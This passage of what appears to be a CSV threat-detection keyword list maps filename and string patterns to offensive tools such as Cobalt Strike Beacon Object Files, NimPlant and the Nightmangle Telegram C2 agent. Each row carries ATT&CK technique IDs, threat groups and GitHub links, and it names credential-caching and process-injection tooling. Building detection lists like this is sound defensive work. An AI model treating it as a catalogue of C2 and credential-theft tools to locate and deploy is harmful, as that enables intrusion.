T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wahyuhadi/beacon-c2-go,1,1,N/A,10,10,36,8,2020-01-14T11:15:42Z,2019-12-22T08:59:34Z -*BeaconCleanupProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconConsoleWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object 
Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconGetSpawnTo*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*beacongrapher.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*BeaconInjectProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconInjectProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconInjectProcess*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z 
-*BeaconInjectProcess*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*BeaconJob.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconJobWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*beaconlogs.json*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*beaconlogtracker.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*BeaconNote.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*BeaconNotify.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*BeaconObject.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconOutputStreamW*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z 
-*BeaconOutputWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconPrintf(*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 